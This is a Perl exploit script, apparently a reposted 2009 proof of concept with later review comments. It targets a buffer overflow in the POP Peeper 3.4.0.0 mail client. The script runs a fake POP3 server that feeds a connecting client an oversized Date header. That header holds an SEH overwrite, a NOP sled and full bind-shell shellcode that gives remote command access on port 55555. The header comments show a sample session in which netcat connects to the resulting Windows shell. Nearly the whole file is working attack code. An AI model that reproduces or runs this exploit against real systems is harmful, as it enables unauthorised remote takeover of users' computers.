
KL0309EXP-poppeeper_date-bof.txt

Posted on 12 March 2009

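#!/usr/bin/perl
# KL0309EXP-poppeeper_date-bof.pl
# 03.12.2009
# Krakow Labs Development [www.krakowlabs.com]
# POP Peeper 3.4.0.0 Date Remote Buffer Overflow Exploit
#
# SEH overwrite exploitation, uses Imap.dll (included with POP Peeper) for universal
# exploitation (more love for no /SafeSEH). Tested on Windows XP SP3.
#
# rush@KL (Jeremy Brown) [rush@krakowlabs.com]
#
# rush@linux:~$ sudo perl KL0309EXP-poppeeper_date-bof.pl
# xx.xx.xx.xx
# rush@linux:~$ nc xx.xx.xx.xx 55555
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\Program Files\POP Peeper>exit
# exit
# rush@linux:~$
#
# Associated Files & Information:
# http://www.krakowlabs.com/res/adv/KL0309ADV-poppeeper_date-bof.txt
# http://www.krakowlabs.com/dev/exp/KL0309EXP-poppeeper_date-bof.pl.txt
# http://www.krakowlabs.com/dev/exp/KL0309EXP-poppeeper_date-bof.jpeg
#
# KL0309EXP-poppeeper_date-bof.pl
#
# NOTE(review): the published listing lost every backslash, so the "\x.."
# byte escapes appeared as "x.." and the CRLF terminators as blanks.  The
# escapes are restored below; the POP3 line endings are reconstructed as
# "\r\n" per RFC 1939 -- confirm against the original if an exact copy matters.
#
# Operational caveats (lab use only):
#   * The fake server binds TCP/110 without a LocalAddr, i.e. on every
#     interface, and needs root for the privileged port (hence the sudo above).
#     Any client that connects and walks the dialogue below gets the payload.
#   * The shellcode is an UNAUTHENTICATED bind shell on TCP/55555 on the
#     victim: whoever can reach that port gets a command prompt, not just you.

use strict;
use warnings;
use IO::Socket;

# SEH chain overwrite values.  Packed with 'V' (explicit 32-bit little-endian)
# rather than the native-endian signed 'l' of the original, because the target
# is 32-bit x86 no matter which host runs this script.
my $NEXT_SEH = 0x909006EB;   # on the wire: EB 06 90 90 = JMP +6 (over the handler slot), NOP, NOP
my $SEH      = 0x10014E39;   # POP POP RET in Imap.dll ("Windows XP UNIVERSAL" per the original author)

# Win32 Bindshell Shellcode (author=metasploit,port=55555,encoder=pexalphanum,size=709,exitfunc=thread)
my $SHELLCODE =
    "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" .
    "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" .
    "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" .
    "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" .
    "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x46\x4b\x4e" .
    "\x4d\x44\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x36\x4b\x38" .
    "\x4e\x46\x46\x32\x46\x42\x4b\x48\x45\x34\x4e\x53\x4b\x58\x4e\x47" .
    "\x45\x30\x4a\x37\x41\x30\x4f\x4e\x4b\x38\x4f\x44\x4a\x31\x4b\x38" .
    "\x4f\x35\x42\x42\x41\x50\x4b\x4e\x49\x54\x4b\x48\x46\x33\x4b\x38" .
    "\x41\x50\x50\x4e\x41\x43\x42\x4c\x49\x39\x4e\x4a\x46\x58\x42\x4c" .
    "\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e" .
    "\x46\x4f\x4b\x53\x46\x35\x46\x32\x4a\x42\x45\x57\x45\x4e\x4b\x48" .
    "\x4f\x35\x46\x42\x41\x50\x4b\x4e\x48\x36\x4b\x48\x4e\x30\x4b\x54" .
    "\x4b\x58\x4f\x35\x4e\x51\x41\x50\x4b\x4e\x43\x50\x4e\x52\x4b\x58" .
    "\x49\x38\x4e\x56\x46\x52\x4e\x51\x41\x36\x43\x4c\x41\x43\x4b\x4d" .
    "\x46\x36\x4b\x58\x43\x54\x42\x53\x4b\x48\x42\x44\x4e\x30\x4b\x58" .
    "\x42\x57\x4e\x31\x4d\x4a\x4b\x38\x42\x54\x4a\x50\x50\x55\x4a\x46" .
    "\x50\x58\x50\x44\x50\x50\x4e\x4e\x42\x55\x4f\x4f\x48\x4d\x48\x56" .
    "\x43\x35\x48\x36\x4a\x46\x43\x43\x44\x53\x4a\x46\x47\x47\x43\x37" .
    "\x44\x43\x4f\x55\x46\x55\x4f\x4f\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e" .
    "\x4e\x4f\x4b\x53\x42\x55\x4f\x4f\x48\x4d\x4f\x35\x49\x58\x45\x4e" .
    "\x48\x36\x41\x58\x4d\x4e\x4a\x50\x44\x30\x45\x45\x4c\x46\x44\x30" .
    "\x4f\x4f\x42\x4d\x4a\x56\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x55" .
    "\x4f\x4f\x48\x4d\x43\x55\x43\x45\x43\x55\x43\x35\x43\x35\x43\x34" .
    "\x43\x55\x43\x44\x43\x45\x4f\x4f\x42\x4d\x48\x46\x4a\x46\x49\x4d" .
    "\x43\x30\x48\x36\x43\x55\x49\x38\x41\x4e\x45\x49\x4a\x46\x46\x4a" .
    "\x4c\x31\x42\x47\x47\x4c\x47\x55\x4f\x4f\x48\x4d\x4c\x36\x42\x41" .
    "\x41\x35\x45\x45\x4f\x4f\x42\x4d\x4a\x36\x46\x4a\x4d\x4a\x50\x42" .
    "\x49\x4e\x47\x45\x4f\x4f\x48\x4d\x43\x55\x45\x45\x4f\x4f\x42\x4d" .
    "\x4a\x36\x45\x4e\x49\x54\x48\x48\x49\x54\x47\x35\x4f\x4f\x48\x4d" .
    "\x42\x55\x46\x45\x46\x55\x45\x45\x4f\x4f\x42\x4d\x43\x59\x4a\x46" .
    "\x47\x4e\x49\x57\x48\x4c\x49\x37\x47\x55\x4f\x4f\x48\x4d\x45\x55" .
    "\x4f\x4f\x42\x4d\x48\x36\x4c\x46\x46\x46\x48\x56\x4a\x46\x43\x36" .
    "\x4d\x36\x49\x48\x45\x4e\x4c\x36\x42\x55\x49\x45\x49\x32\x4e\x4c" .
    "\x49\x48\x47\x4e\x4c\x36\x46\x54\x49\x38\x44\x4e\x41\x43\x42\x4c" .
    "\x43\x4f\x4c\x4a\x50\x4f\x44\x34\x4d\x32\x50\x4f\x44\x54\x4e\x32" .
    "\x43\x39\x4d\x48\x4c\x37\x4a\x43\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x36" .
    "\x44\x47\x50\x4f\x43\x4b\x48\x51\x4f\x4f\x45\x57\x46\x34\x4f\x4f" .
    "\x48\x4d\x4b\x45\x47\x45\x44\x55\x41\x35\x41\x55\x41\x35\x4c\x36" .
    "\x41\x50\x41\x55\x41\x35\x45\x45\x41\x45\x4f\x4f\x42\x4d\x4a\x56" .
    "\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x55\x4f\x4f\x48\x4d\x4c\x36" .
    "\x4f\x4f\x4f\x4f\x47\x43\x4f\x4f\x42\x4d\x4b\x48\x47\x35\x4e\x4f" .
    "\x43\x58\x46\x4c\x46\x36\x4f\x4f\x48\x4d\x44\x45\x4f\x4f\x42\x4d" .
    "\x4a\x36\x4f\x4e\x50\x4c\x42\x4e\x42\x56\x43\x55\x4f\x4f\x48\x4d" .
    "\x4f\x4f\x42\x4d\x5a";

# Layout of the overflowing "Date:" header value (offsets from the original exploit):
my $PAD_LEN  = 132;   # filler bytes before the nSEH slot
my $SLED_LEN = 32;    # NOPs between the SEH record and the shellcode

# Canned POP3 replies, one per client command, sent after the greeting.  The
# command each one answers is not verified here; from the reply shapes they
# presumably correspond to USER, PASS, STAT, UIDL, LIST and RETR/TOP.  The last
# one announces the message whose "Date:" header carries the overflow.
my @REPLIES = (
    "+OK\r\n",
    "+OK\r\n",
    "+OK 1 100\r\n",
    "+OK 1 w00t\r\n.\r\n",
    "+OK 1 100\r\n.\r\n",
    "+OK 100 octets\r\n",
);

# Builds the malicious message: a "Date:" header whose value is
# padding | nSEH (JMP +6) | SEH (POP POP RET) | NOP sled | bind-shell shellcode,
# terminated with the POP3 multi-line end marker.  Returns the raw byte string.
sub build_payload {
    my $next_seh = pack('V', $NEXT_SEH);
    my $seh      = pack('V', $SEH);
    return 'Date: '
        . ('A' x $PAD_LEN)
        . $next_seh
        . $seh
        . ("\x90" x $SLED_LEN)
        . $SHELLCODE
        . "\r\n.\r\n";
}

# Plays the fake-server side of the POP3 session on an accepted client socket:
# greeting, then one canned reply per client command, then the payload.
# Replies are sent blindly -- the client's commands are read and discarded,
# and a client that hangs up mid-dialogue is not detected (same as the original).
sub serve_client {
    my ($cli, $payload) = @_;
    $cli->send("+OK\r\n");                 # greeting
    for my $reply (@REPLIES) {
        $cli->recv(my $command, 512);      # whatever the client asks, the answer is scripted
        $cli->send($reply);
    }
    $cli->send($payload);
    return;
}

# Listens on TCP/110 (all interfaces), waits up to 60 seconds for exactly one
# client, prints its address, serves it the exploit and exits.
sub main {
    my $serv = IO::Socket::INET->new(
        Proto     => 'tcp',
        LocalPort => 110,
        Listen    => 1,
        Timeout   => 60,
    ) or die "Error: listen(110): $@\n";   # IO::Socket reports the reason in $@
    # NOTE(review): without Reuse => 1 an immediate rerun can fail on a TIME_WAIT socket.
    my $cli = $serv->accept() or die "Error: accept(): $!\n";
    print $cli->peerhost, "\n";
    serve_client($cli, build_payload());
    close($cli);
    close($serv);
    return;
}

main() unless caller;   # modulino: run when executed, stay quiet when required by a test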

 

